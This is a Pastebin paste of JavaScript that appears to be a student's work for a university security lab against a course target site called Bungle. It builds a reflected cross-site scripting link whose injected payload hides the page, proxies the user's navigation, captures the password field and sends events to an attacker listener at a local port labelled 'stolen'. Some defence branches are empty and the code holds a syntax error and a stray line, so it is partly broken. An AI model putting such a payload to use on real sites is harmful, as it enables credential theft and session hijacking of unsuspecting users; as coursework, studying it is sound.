Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <h3>Hello</h3>
- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- $(document).ready(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- // Extend this function:
- function payload(attacker) {
- function log(data) {
- console.log($.param(data))
- $.get(attacker, data);
- }
- function proxy(href) {
- $("html").load(href, function(){
- console.log("loaded nex page");
- $("html").show();
- log({event: "nav", uri: href});
- $("#query").val(href.toString());
- $(".btn").attr("type", "button");
- $(".btn").click(function(){
- var nextlink = $(this).attr("formaction");
- $("html").load(nextlink.toString(), { username:"quinn" password:$("#userpass").val()} )
- });
- });
- }
- $("html").hide();
- proxy("./");
- }
- function makeLink(xssdefense, target, attacker) {
- if (xssdefense == 0) {
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<script" + ">" + payload.toString() +
- ";payload(\"" + attacker + "\");</script" + ">");
- } else if(xssdefense == 1){
- }else if (xssdefense == 2){
- }else{
- }
- }
- var xssdefense = 0;
- var target = "http://bungle-cs461.cs.illinois.edu/";
- var attacker = "http://127.0.0.1:31337/stolen";
- </script>
- 44()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement